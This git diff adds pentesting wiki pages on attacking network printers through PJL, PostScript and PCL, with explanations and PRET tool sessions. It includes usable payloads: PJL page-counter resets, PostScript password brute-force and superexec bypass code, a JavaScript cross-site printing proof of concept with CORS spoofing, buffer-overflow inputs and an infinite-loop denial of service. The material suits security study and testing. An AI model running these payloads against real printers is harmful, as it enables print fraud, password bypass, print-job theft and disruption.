+A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [CPCA](http://www.undocprint.org/formats/printer_control_languages/cpca), [XJCL](http://www.undocprint.org/formats/printer_control_languages/xjcl), [EJL](http://www.undocprint.org/formats/printer_control_languages/ejl) and **PJL** – which is supported by a variety of printers and will be discussed below. In addition, **printer control and management languages** are designed to **affect** not only a single print job but the **device** as a **whole**. One approach to define a common standard for this task was [NPAP](http://www.undocprint.org/formats/printer_control_languages/npap). However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use SNMP or its **PJL-based** metalanguage **PML**.
+
+### PJL
+
+The Printer Job Language \(PJL\) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ and can be used to change settings like paper tray or size. It must however be pointed out that **PJL is not limited to the current print job as some settings can be made permanent**. PJL can also be used to **change the printer's display or read/write files on the device**. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. **PJL is further used to set the file format of the actual print data to follow**. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below:
+
+```text
+@PJL SET PAPER=A4
+@PJL SET COPIES=10
+@PJL ENTER LANGUAGE=POSTSCRIPT
+```
+
+Inside the ****[**page about port 9100 'raw port'**](../9100-pjl.md) ****you can find more information about **how to enumerate PJL**.
+
+### PML
+
+The **Printer Management Language** \(PML\) is a proprietary language to control **HP printers**. It basically **combines** the features of **SNMP** **with PJL**. Publicly available documentation has not been released, however parts of the standard were leaked by the [LPRng](https://en.wikipedia.org/wiki/LPRng) project: the **PJL Passthrough to PML and SNMP User’s Guide** defines defines PML as ‘an object-oriented request-reply printer management protocol’ and gives an introduction to the basics of the syntax. PML is embedded within PJL and **can be used to read and set SNMP values on a printer device**. This is especially **interesting** if a **firewall blocks** access to **SNMP** services \(161/udp\). The use of PML within a print job retrieving the `hrDeviceDescr` value \(OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device\) is demonstrated below:
+
+```text
+> @PJL DMINFO ASCIIHEX="000006030302010301"
+< "8000000603030201030114106870204c617365724a65742034323530
+```
+
+The rear part of string responded by the printer, `6870204c617365724a65742034323530` is hexadecimal for `hp LaserJet 4250`. As can be seen, it is possible to **invoke** \(a subset of\) **SNMP** **commands over PJL via PML**. A security-sensitive use of PML is to [reset HP printers to factory defaults](./#factory-defaults) via ordinary print jobs, therefore removing protection mechanisms like user-set passwords.
+
+### UEL
+
+The Universal Exit Language \(UEL\) actually is **not a real job control ‘language’ but a single command used to terminate the current data stream**: the escape character \(`\x1b`\), followed by `%-12345X`. It was originally introduced with HP's PCL and is **supported by most modern laser printers**. A good practice of ‘printer drivers’ is to invoke the UEL at the beginning and at the end of each print job, so interpretation of the printer language is stopped/restarted and each job has its own, separate environment as shown below:
+
+```text
+\x1b%-12345X
+@PJL SET PAPER=A4
+@PJL ENTER LANGUAGE=PCL
+...
+[PCL datastream]
+...
+\x1b%-12345X
+```
+
+Otherwise, for example PJL settings like paper media size or PostScript definitions set in one print job would influence the next job. **UEL can be handy to string together multiple jobs into a single file/datastream sent to the printer**. This can be used to fool **hardware page counters** or to switch the printing language in advances **cross-site printing attacks**.
+
+## Page Description Languages
+
+A **page description language** \(PDL\) specifies the **appearance of the actual document**. It must however be pointed out that some PDLs offer limited job control, so **a clear demarcation between page description and printer/job control language is not always possible**. The function of a ‘printer driver’ is to **translate** the **file** to be **printed** into a **PDL** that is **understood** by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [GDI](https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers) printers only accept simple bitmap datastreams like [ZJS](http://www.undocprint.org/formats/page_description_languages/zjstream) while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [PRESCRIBE](http://www.undocprint.org/formats/page_description_languages/prescribe), [SPL](http://www.undocprint.org/formats/page_description_languages/spl), [XES](http://www.undocprint.org/formats/page_description_languages/xes), [CaPSL](http://www.undocprint.org/formats/page_description_languages/capsl), [RPCS](http://www.undocprint.org/formats/page_description_languages/rpcs), [ESC/P](https://en.wikipedia.org/wiki/ESC/P) which is mostly used in dot matrix printers or [HP-GL](https://en.wikipedia.org/wiki/HPGL) and [HP-GL/2](https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2) which have been designed for plotters. Support for direct [PDF](https://en.wikipedia.org/wiki/Portable_Document_Format) and [XPS](https://en.wikipedia.org/wiki/Open_XML_Paper_Specification) printing is also common on newer printers. **The most common ‘standard’ page description languages however are PostScript and PCL.**
+
+### PostScript \(PS\)
+
+The term ‘page description’ may be misleading though, as **PostScript is capable of much more than just creating vector graphics**. PostScript is a stack-based, **Turing-complete** programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries and was created by Adobe.  
+Technically spoken, access to a PostScript interpreter can already be classified as **code execution** because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files.  
+Originally designed as a feature, the dangers of such functionality **were limited** before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript \(EPS\) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [LaTeX](https://en.wikipedia.org/wiki/LaTeX) documents. Like **PJL** and **PCL**, **PostScript** supports **bidirectional communication** been host and printer.  
+Example PostScript code to echo Hello world to stdout is given below:
+
+```text
+%!
+(Hello world) print
+```
+
+Brother and Kyocera use their own PostScript clones: **Br-Script** and **KPDL**. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [denial of service](http://hacking-printers.net/wiki/index.php/Denial_of_service) \(for example, through infinite loops\), print job [manipulation](http://hacking-printers.net/wiki/index.php/Print_job_manipulation) and [retention](http://hacking-printers.net/wiki/index.php/Print_job_retention) as well as gaining access to the printer's [file system](http://hacking-printers.net/wiki/index.php/File_system_access).
+
+#### Exiting the server loop
+
+Normally, each print job is encapsulated in its own, separate environment. One interesting feature of **PostScript** is that a program **can circumvent print job encapsulation** and alter the initial VM for subsequent jobs. To do so, it can use either startjob, a Level 2 feature:
+
+```text
+true 0 startjob
+```
+
+or exitserver \(available in all implementations that include a job server\):
+
+```text
+serverdict begin 0 exitserver
+```
+
+This capability is controlled by the StartJobPassword which defaults to `0` \(compare credential disclosure\). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, **any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs**. In other words, a print job can access and alter further jobs. Bingo!
+
+#### Operator redefinition
+
+When a **PostScript** document **calls** an **operator**, the **first version found** on the dictionary stack is used. Operators usually reside in the systemdict dictionary, however by placing a new version into the userdict dictionary, operators can be practically overwritten because **the user-defined version is the first one found on the dictionary stack**. Using the startjob/exitserver operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below:
+
+  
+[![The PostScript dictionary stack](http://hacking-printers.net/wiki/images/thumb/f/ff/Dictstack.png/300px-Dictstack.png)](http://hacking-printers.net/wiki/index.php/File:Dictstack.png)
+
+  
+The **potential impact of redefining operators** is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [denial of service](http://hacking-printers.net/wiki/index.php/Document_processing#Showpage_redefinition), print job [retention](http://hacking-printers.net/wiki/index.php/Print_job_retention) and [manipulation](http://hacking-printers.net/wiki/index.php/Print_job_manipulation). Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [RIP](https://en.wikipedia.org/wiki/Raster_image_processor).
+
+### PCL
+
+PCL 3 and PCL 4 added support for fonts and macros which both can be permanently downloaded to the device – however only referenced to by a numeric id, not by a file name, as **direct access to the file system is not intended**. PCL 1 to 5 consist of escape sequences followed by one or more ASCII characters representing a command to be interpreted. PCL 6 Enhanced or ‘PCL XL’ uses a binary encoded, object-oriented protocol. An **example PCL document to print ‘Hello world’ is given below**:
+
+```text
+<Esc>Hello world
+```
+
+Due to its limited capabilities, PCL is **hard to exploit** from a security perspective unless one discovers interesting proprietary commands in some printer manufacturers's PCL flavour. The **PRET** tool implements a **virtual, PCL-based file system** which uses macros to **save file content and metadata in the printer's memory**. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may apply as ‘misuse of service’ depending on the corporate policy.
+
+## Misc Attacks
+
+### USB drive or cable
+
+Data can be sent to and received from a local printer by [USB](https://en.wikipedia.org/wiki/USB) or [parallel](https://en.wikipedia.org/wiki/IEEE_1284) cables. Both channels are supported by **PRET** to communicate with the device. In addition, printers and MFPs often ship with Type-A USB ports which allows users to print directly from an USB device.  
+While plugged-in USB drives do **not offer a bidirectional channel**, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations.
+
+### Cross-site printing
+
+Abusing **client web request** an attacker can **abuse arbitrary printers** inside the internal network of the client connected to his malicious web page.  
+[**Learn how can this be possible here.**](cross-site-printing.md)\*\*\*\*
+
+### Abusing Spooler service in AD
+
+If you can find any **Spool service listening** inside the domain, you may be able to **abuse** is to **obtain new credentials** and **escalate privileges**.  
+[**More information about how to find a abuse Spooler services here.**](../../windows/active-directory-methodology/printers-spooler-service-abuse.md)\*\*\*\*
+
+## Privilege Escalation
+
+### Factory Defaults
+
+There are several possible ways to **reset** a device to factory defaults, and this is a security-critical functionality as it **overwrites protection mechanisms** like user-set passwords.  
+[**Learn more here.**](factory-defaults.md)\*\*\*\*
+
+### **Accounting Bypass**
+
+You may be able to **impersonate existent or non-existent users** to print pages using their accounts or **manipulate** the hardware or software **counter** to be able to print more pages.  
+[**Learn how to do it here.**](accounting-bypass.md)\*\*\*\*
+
+### **Scanner and Fax**
+
+Accessing the Scanner of Fax functionalities you may be able to access other functionalities, but this all of this is vendor-dependent.  
+****[**Learn more here.**](scanner-and-fax.md)\*\*\*\*
+
+## **Print job access**
+
+### **Print Job Retention**
+
+Jobs can be **retained in memory** and be **printed** again in a **later moment from the control panel**, or using **PostScript** you can even **remotely access all the jobs that are going to be printed, download them** and print them.  
+[**Learn more here.**](print-job-retention.md)\*\*\*\*
+
+### **Print Job Manipulation**
+
+You can **add new content** to the pages that are printed, **change all the content** that is going to be printed or even **replace just certain letters or words.**  
+[**Learn how to do it here.**](print-job-manipulation.md)\*\*\*\*
+
+## **Information Disclosure**
+
+### **Memory access**
+
+You may be able to **dump** the **NVRAM** memory and **extract sensitive** info \(like passwords\) from there.  
+[**Read how to do that here.**](memory-access.md)\*\*\*\*
+
+### **File system access**
+
+You may be able to **access the file system** abusing **PJL** or **PostScript**.  
+[**Read how to do that here.**](file-system-access.md)\*\*\*\*
+
+### **Credentials Disclosure/Brute-Force**
+
+You may be able to **disclosure the password** being using abusing **SNMP** or the **LDAP** settings or you could try to **brute-force PJL** or **PostScript**.  
+[**Read how to do that here**](credentials-disclosure-brute-force.md)**.**
+
+## **Code Execution**
+
+### **Buffer Overflows**
+
+Several **buffer overflows** have been **found** already in **PJL input** and in the **LDP daemon**, and there could be more.  
+[**Read this for more information.**](buffer-overflows.md)\*\*\*\*
+
+### Firmware updates
+
+You may be able to **make the printer update the driver to a malicious one** specially crafted by you.  
+[**Read this for more information.**](firmware-updates.md)\*\*\*\*
+
+### **Software Packages**
+
+ printer vendors have started to introduce the **possibility to install custom software on their devices** but information is not publicly available. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors.  
+[**Read more about this here.**](software-packages.md)\*\*\*\*
+
+## **Denial of service**
+
+### **Transmission channel**
+
+Occupying all the **connections** and **increasing** the **timeout** of the server could lead to a DoS.  
+[**Learn more about this here.**](transmission-channel.md)\*\*\*\*
+
+### **Document Processing**
+
+You can use **PostScript** and **PJL** to perform **infinite loops**, **redefine commands** to avoid any printing, **turn off** any printing functionality or even **set the printer in offline mode**.  
+[**Learn more about this here.**](document-processing.md)\*\*\*\*
+
+### **Physical damage**
+
+One could **abuse PJL** or **PostScript** to **write** in the **NVRAM** hundreds of thousands of times with the goal of **breaking the chip** or at least make the **parameters be frozen** intro the factory default ones.  
+[**Learn more about this here.**](physical-damage.md)\*\*\*\*
+
diff --git a/pentesting/pentesting-printers/accounting-bypass.md b/pentesting/pentesting-printers/accounting-bypass.md
new file mode 100644
index 00000000..27fcfd06
--- /dev/null
+++ b/pentesting/pentesting-printers/accounting-bypass.md
@@ -0,0 +1,80 @@
+---
+description: 'From http://hacking-printers.net/wiki/index.php/Accounting_bypass'
+---
+
+# Accounting bypass
+
+## **Introduction**
+
+**Printing without permission** can itself be a security risk or breach of company policy. In environments where print jobs are charged for, an inside attacker has a motivation to bypass the accounting system. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers.
+
+There are two major approaches when it comes to print job accounting: Either **let the printer handle it directly or use a print server in between**. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [CUPS](https://en.wikipedia.org/wiki/CUPS) or [LPRng](https://en.wikipedia.org/wiki/LPRng) – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. **It is important to note that direct network access to the printer must be restricted**, otherwise an attacker can **easily bypass the print server** and its accounting mechanisms. This means filtering access to typical and atypical ports \(LPD, IPP, raw, HTTP, SMB, FTP, SNMP\).
+
+There are basically two approaches to circumvent the print job accounting systems: either **impersonate another user or manipulate the counter** of printed pages. In the following both options are discussed for LPRng \(v3.8.B\) and CUPS \(v2.1.4\) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below.
+
+| Printing system | Protocol | Encryption | Authentication | Page counter |
+| :--- | :--- | :--- | :--- | :--- |
+| **LPRng** | LPD | SSL/TLS | Kerberos, PGP | hardware |
+| **CUPS** | IPP | SSL/TLS | Kerberos, HTTP | software |
+
+## Authentication bypasses
+
+LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [Kerberos](https://en.wikipedia.org/wiki/Kerberos_%28protocol%29), [PGP](https://en.wikipedia.org/wiki/Pretty_Good_Privacy) signed print jobs or HTTP [basic](https://en.wikipedia.org/wiki/Basic_access_authentication)/[digest](https://en.wikipedia.org/wiki/Digest_access_authentication) authentication. If **configured properly** and in case the attacker cannot access the printer directly she will be **not be able to impersonate other users**. Those security features however are **optional and rarely applied** in the real-world print servers. Instead, the **usernames given as LPD \(LPRng\) or IPP \(CUPS\) parameters are logged and accounted for** – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions**: Kerberos needs a special setup** on every client and **HTTP** authentication **requires** users to enter a **password** whenever they want to print something while the costs of a few unaccounted printouts are bearable.
+
+You can **verify proper authentication** trying to print with a **custom username** like this:
+
+```text
+lp -U nobody test.ps
+```
+
+## Page counter manipulation
+
+### Hardware page counters
+
+For correct accounting the **number of printed pages must be determined** by the printing system which is not a trivial task. The authors of **LPRng** _make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles_. Such **hardware page counters** are supported by most printers and **read** by LPRng **using PJL after** every **print** job. **HP** has even documented a feature to **write** to the **page counter** variable by setting the printer into service mode. This way, the **page counter** of the _HP LaserJet 1200, HP LaserJet 4200N_ and _HP LaserJet 4250N_ **can be manipulated** within a print job. At the end of the document to be printed and separated by the [UEL](./#uel), the counter simply has to be reset to its original value \(for example, `2342`\):
+
+```text
+\x1b%-12345X@PJL JOB
+This page was printed for free
+\x1b%-12345X@PJL EOJ
+\x1b%-12345X@PJL JOB
+@PJL SET SERVICEMODE=HPBOISEID
+@PJL SET PAGES=2342
+\x1b%-12345X@PJL EOJ
+```
+
+An attacker might set a negative number of printed pages. Note that resetting the device to [Factory defaults](factory-defaults.md) also **resets the page counter to zero on some** of the tested devices.  
+Lowering the page counter can also be used to **sell a printer above its price** as it can be compared to the odometer when buying a second-hand car. It is however worth emphasising that **resetting the page counter is not necessarily for malicious purposes**: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter.
+
+On older HP laserjets the `pagecount`command of [PRET](https://github.com/RUB-NDS/PRET) can be used to easily set hardware pagecounters:
+
+```text
+./pret.py -q printer pjl
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> pagecount 10
+Old pagecounter: 53214
+New pagecounter: 10
+```
+
+### Software page counters
+
+**CUPS** uses **software page counters** which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the PageCount system parameter exists – which will return false when interpreted in CUPS/Ghostscript – before actually printing the document as shown below.
+
+```text
+currentsystemparams (PageCount) known {
+  <@\textit{[...] code which is only executed on a printer device [...]}@>
+} if
+```
+
+This way, the accounting software used by CUPS renders a different document than the printer. **CUPS only accounts for one page** – which seems to be a **hardcoded minimum** – while the **real** print job can contain **hundreds** **of pages**. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter \(Ghostscript's ps2write\) before it reaches the page counter.
+
+**How to test for this attack?**
+
+**Wrap** an arbitrary **multi-page PostScript document** in the **code above** and print. Then go to [`http://printserver:631/jobs?which_jobs=all`](http://printserver:631/jobs?which_jobs=all) and check CUPS's page counter for this print job. Note that have to establish a raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done by setting the content type to `application/vnd.cups-raw`. If your system is already configured to use the print server to be tested, simply use:
+
+```text
+lp -o raw test.ps
+```
+
diff --git a/pentesting/pentesting-printers/buffer-overflows.md b/pentesting/pentesting-printers/buffer-overflows.md
new file mode 100644
index 00000000..13c2f1b5
--- /dev/null
+++ b/pentesting/pentesting-printers/buffer-overflows.md
@@ -0,0 +1,49 @@
+# Buffer Overflows
+
+## PJL
+
+Various _Lexmark_ laser printers crash when when receiving about 1.000 characters as the INQUIRE argument \(see [CVE-2010-0619](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619)\) and sending about 3.000 characters as the SET argument to the _Dell 1720n_ crashes the device:
+
+```text
+@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…
+```
+
+You can check for Buffer Overflows using [**PRET**](https://github.com/RUB-NDS/PRET):
+
+```bash
+./pret.py -q printer pjl
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> flood
+Buffer size: 10000, Sending: @PJL SET [buffer]
+Buffer size: 10000, Sending: @PJL [buffer]
+Buffer size: 10000, Sending: @PJL COMMENT [buffer]
+Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
+Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
+Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
+Buffer size: 10000, Sending: @PJL INFO [buffer]
+Buffer size: 10000, Sending: @PJL ECHO [buffer]
+Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
+Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
+Buffer size: 10000, Sending: @PJL USTATUS [buffer]
+Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
+Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
+Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
+Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
+Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
+Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"
+```
+
+## LPD daemon
+
+It allows multiple user-defined vectors like _jobname, username or hostname_, which may **not be sufficiently protected. S**everal vulnerabilities related to this malfunction has been already discovered.
+
+A simple **LPD fuzzer** to test for buffer overflows can be created using the `lpdtest` tool **included** in [PRET](https://github.com/RUB-NDS/PRET). The `in` argument sets all user inputs defined by the LPD protocol to a certain value \(in this case, Python output\):
+
+```bash
+./lpdtest.py printer in "`python -c 'print "x"*150'`"
+```
+
+**You can find more information about these attacks in** [**http://hacking-printers.net/wiki/index.php/Buffer\_overflows**](http://hacking-printers.net/wiki/index.php/Buffer_overflows)\*\*\*\*
+
diff --git a/pentesting/pentesting-printers/credentials-disclosure-brute-force.md b/pentesting/pentesting-printers/credentials-disclosure-brute-force.md
new file mode 100644
index 00000000..27e7ff5a
--- /dev/null
+++ b/pentesting/pentesting-printers/credentials-disclosure-brute-force.md
@@ -0,0 +1,87 @@
+# Credentials Disclosure / Brute-Force
+
+Printers are commonly deployed with a **default password or no initial password at all**. In both cases, end-users or administrators have to actively set a password to secure the device.
+
+## Password Disclosure
+
+### SNMP
+
+Ancient HP printers had a vulnerable OID that returned the password. Other vendors may have similar SNMP based issues.
+
+```text
+snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
+iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
+```
+
+### Pass-Back
+
+If the printer is **authorising people using an external LDAP**. If you have access to the **change this settings** \(maybe using a web console interface\) you can make the printer connects to your LDAP server and authorise any user.  
+Note that you could abuse this settings also to **steal the credentials the printer is using** to connect to the LDAP server. [Read here to learn more](../../windows/active-directory-methodology/ad-information-in-printers.md).
+
+## Brute-Force
+
+### PJL
+
+PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size. Noways in less than 30min you can guess the correct password.
+
+You can use `lock` and `unlock` commands of [PRET](https://github.com/RUB-NDS/PRET) to test bruteforce:
+
+```text
+./pret.py -q printer pjl
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> lock 999
+PIN protection:  ENABLED
+Panel lock:      ON
+Disk lock:       ON
+printer:/> unlock
+No PIN given, cracking.
+PIN protection:  DISABLED
+Panel lock:      OFF
+Disk lock:       OFF
+```
+
+### PostScript
+
+PostScript offers two types of passwords: The `SystemParamsPassword` is used to change print job settings like paper size, while the `StartJobPassword` is required to exit the server loop and therefore permanently alter the PostScript environment.
+
+Brute-force attacks against PostScript passwords can be performed extremely fast because the **PostScript interpreter can be programmed to literally crack itself**:
+
+```text
+/min 0 def /max 1000000 def
+statusdict begin {
+  min 1 max
+  {dup checkpassword {== flush stop} {pop} ifelse} for
+} stopped pop
+```
+
+Another approach is to **bypass PostScript passwords** by resetting them with Adobe's proprietary `superexec` operator. This operator resides in the internaldict dictionary, which is ‘protected’ by a static, magic password \(`1183615869`\). Wrapping PostScript code into superexec allows an attacker to ignore various protection mechanisms of the language, which would normally raise an invalidaccess error. This can be used to set PostScript passwords without initially submitting the current password as shown below:
+
+```text
+{ << /SystemParamsPassword (0)
+     /StartJobPassword (0) >> setsystemparams
+} 1183615869 internaldict /superexec get exec
+```
+
+The lock and unlock commands of [PRET](https://github.com/RUB-NDS/PRET) can be used to test **brute-force** attacks against numeric \(integer\) PostScript passwords or to **bypass** them with **superexec magic**:
+
+```text
+./pret.py -q printer ps
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> lock 999
+printer:/> unlock
+No password given, cracking.
+Device unlocked with password: 999
+printer:/> lock S0me_Re4lly_g00d_Passw0rd!
+printer:/> unlock bypass
+Resetting password to zero with super-secret PostScript magic
+Device unlocked with password: 0
+```
+
+
+
+**More information about Password Disclosure and Brute-Force in** [**http://hacking-printers.net/wiki/index.php/Credential\_disclosure**](http://hacking-printers.net/wiki/index.php/Credential_disclosure)\*\*\*\*
+
diff --git a/pentesting/pentesting-printers/cross-site-printing.md b/pentesting/pentesting-printers/cross-site-printing.md
new file mode 100644
index 00000000..ee031d22
--- /dev/null
+++ b/pentesting/pentesting-printers/cross-site-printing.md
@@ -0,0 +1,67 @@
+---
+description: >-
+  Information from
+  http://hacking-printers.net/wiki/index.php/Cross-site_printing
+---
+
+# Cross-Site Printing
+
+You can make a user send HTTP POST request to the port 9100 of several IPs trying to reach an open raw print port open. If found, the **HTTP header is either printed as plain text or discarded** based on the printer's settings. The **POST data** however can **contain** arbitrary print jobs like **PostScript** or **PJL** commands to be **interpreted**.
+
+#### Enhanced cross-site printing
+
+You can use XMLHttpRequest \(XHR\) JavaScript objects as defined in to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that **data can only be sent to the device**, **not received** because of the same-origin policy. To **bend** the **restrictions** of the same-origin policy, you can **make** the **server** responds with a fake but **valid HTTP response** allowing CORS requests \(including `Access-Control-Allow-Origin=*` \). A schematic overview of the attack is given below:
+
+![Advanced cross-site printing with CORS spoofing](http://hacking-printers.net/wiki/images/thumb/c/ce/Cross-site-printing.png/900px-Cross-site-printing.png)
+
+In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows him to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below:
+
+```javascript
+job = "\x1B%-12345X\r\n"
+    + "%!\r\n"
+    + "(HTTP/1.0 200 OK\\n) print\r\n"
+    + "(Server: PostScript HTTPD\\n) print\r\n"
+    + "(Access-Control-Allow-Origin: *\\n) print\r\n"
+    + "(Connection: close\\n) print\r\n"
+    + "(Content-Length: ) print\r\n"
+    + "product dup length dup string cvs print\r\n"
+    + "(\\n\\n) print\r\n"
+    + "print\r\n"
+    + "(\\n) print flush\r\n"
+    + "\x1B%-12345X\r\n";
+
+var x = new XMLHttpRequest();
+x.open("POST", "http://printer:9100");
+x.send(job);
+x.onreadystatechange = function() {
+  if (x.readyState == 4)
+    alert(x.responseText);
+};
+```
+
+#### Limitations of cross-site printing
+
+Note that **PCL** as page description language is **not applicable for CORS spoofing** because it only allows one **single number** to be **echoed**. **PJL likewise cannot** be used because unfortunately it prepends `@PJL ECHO` to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does **not** mean that **enhanced XSP attacks** are **limited** to **PostScript** jobs: PostScript can be used to respond with a spoofed HTTP header and **the** [**UEL** ](./#uel)**can further be invoked to switch the printer language**. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct `Content-Length` for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the `Connection: close` header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time.
+
+**If** the printer device supports **plain** **text printing** the **HTTP request** header of the XHR is printed out as hard copy – including the `Origin` header field containing the URL that invoked the malicious JavaScript, thus making it **hard** for an attacker to **stay silent**. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however **try to first disable printing functionality** with proprietary PJL commands as proposed in [PJL jobmedia](http://hacking-printers.net/wiki/index.php/Document_processing#PJL_jobmedia) using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting they have some drawbacks beyond not providing feedback using spoofed CORS headers:
+
+* Cross-protocol access to LPD and FTP ports is blocked by various web browsers
+* Parameters for direct printing over the embedded web server are model-specific
+* The IPP standard requires the `Content-type` for HTTP POST requests being set to `application/ipp` which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types
+
+A comparison of cross-site printing channels is given in below:
+
+| Channel | Port | No Feedback | Unsolicited printouts | Standardized | Blocked by |
+| :--- | :--- | :--- | :--- | :--- | :--- |
+| Raw | 9100 | - | ✔ | ✔ | - |
+| Web | 80 | ✔ | - | - | - |
+| IPP | 631 | ✔ | - | ✔ | - |
+| LPD | 515 | ✔ | - | ✔ | FF, Ch, Op |
+| FTP | 21 | ✔ | - | ✔ | FF, Ch, Op, IE |
+
+One major problem of XSP is to **find** out the **correct address** or hostname of the **printer**. Our approach is to **abuse WebRTC** which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port **9100/tcp** for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before.
+
+### Proof-of-concept
+
+A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [hacking-printers.net/xsp/](http://hacking-printers.net/xsp/)
+
diff --git a/pentesting/pentesting-printers/document-processing.md b/pentesting/pentesting-printers/document-processing.md
new file mode 100644
index 00000000..a3f3bb99
--- /dev/null
+++ b/pentesting/pentesting-printers/document-processing.md
@@ -0,0 +1,93 @@
+# Document Processing
+
+Page description languages allowing infinite loops or calculations that require a lot of computing time.  Even minimalist languages like [PCL](http://hacking-printers.net/wiki/index.php/PCL) can be used to upload permanent macros or fonts until the available memory is consumed.
+
+## PostScript
+
+### Infinite loops
+
+```text
+%!
+{} loop
+```
+
+Using [PRET](https://github.com/RUB-NDS/PRET):
+
+```text
+./pret.py -q printer ps
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> hang
+Warning: This command causes an infinite loop rendering the
+device useless until manual restart. Press CTRL+C to abort.
+Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
+```
+
